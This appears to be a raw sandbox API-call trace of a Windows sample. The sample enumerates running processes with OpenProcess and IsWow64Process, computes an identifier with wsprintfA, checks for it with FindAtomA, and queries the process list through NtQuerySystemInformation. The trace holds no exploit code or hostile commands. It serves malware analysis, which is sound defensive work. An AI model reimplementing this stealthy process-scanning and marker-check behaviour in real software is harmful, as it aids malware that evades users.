	[0071.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.758] CloseHandle (hObject=0x224) returned 1
	[0071.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.758] CloseHandle (hObject=0x224) returned 1
	[0071.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.758] CloseHandle (hObject=0x224) returned 1
	[0071.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.759] CloseHandle (hObject=0x224) returned 1
	[0071.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.759] CloseHandle (hObject=0x224) returned 1
	[0071.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.759] CloseHandle (hObject=0x224) returned 1
	[0071.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.760] CloseHandle (hObject=0x224) returned 1
	[0071.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.760] CloseHandle (hObject=0x224) returned 1
	[0071.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dbd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.760] CloseHandle (hObject=0x224) returned 1
	[0071.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.760] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.760] CloseHandle (hObject=0x224) returned 1
	[0071.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.761] CloseHandle (hObject=0x224) returned 1
	[0071.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.761] CloseHandle (hObject=0x224) returned 1
	[0071.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.761] CloseHandle (hObject=0x224) returned 1
	[0071.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.761] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.761] CloseHandle (hObject=0x224) returned 1
	[0071.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0071.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.762] CloseHandle (hObject=0x224) returned 1
	[0071.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.762] CloseHandle (hObject=0x224) returned 1
	[0071.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.762] CloseHandle (hObject=0x224) returned 1
	[0071.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.762] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.762] CloseHandle (hObject=0x224) returned 1
	[0071.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.763] CloseHandle (hObject=0x224) returned 1
	[0071.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.763] CloseHandle (hObject=0x224) returned 1
	[0071.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.763] CloseHandle (hObject=0x224) returned 1
	[0071.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.763] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.763] CloseHandle (hObject=0x224) returned 1
	[0071.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.764] CloseHandle (hObject=0x224) returned 1
	[0071.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.764] CloseHandle (hObject=0x224) returned 1
	[0071.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.764] CloseHandle (hObject=0x224) returned 1
	[0071.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e7e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.764] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.765] CloseHandle (hObject=0x224) returned 1
	[0071.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.765] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.766] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.766] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.766] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.767] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.768] GetLastError () returned 0x5
	[0071.769] GetLastError () returned 0x5
	[0071.769] GetLastError () returned 0x5
	[0071.769] GetLastError () returned 0x5
	[0071.769] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.769] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.769] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.769] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0071.769] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0071.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0071.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0071.769] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.769] CloseHandle (hObject=0x224) returned 1
	[0071.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0071.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0071.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0071.770] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.770] CloseHandle (hObject=0x224) returned 1
	[0071.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16b88) returned 0xc0000004
	[0071.923] VirtualAlloc (lpAddress=0x0, dwSize=0x16c88, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0071.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16c88, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0071.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0071.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0071.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0071.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0071.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0071.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
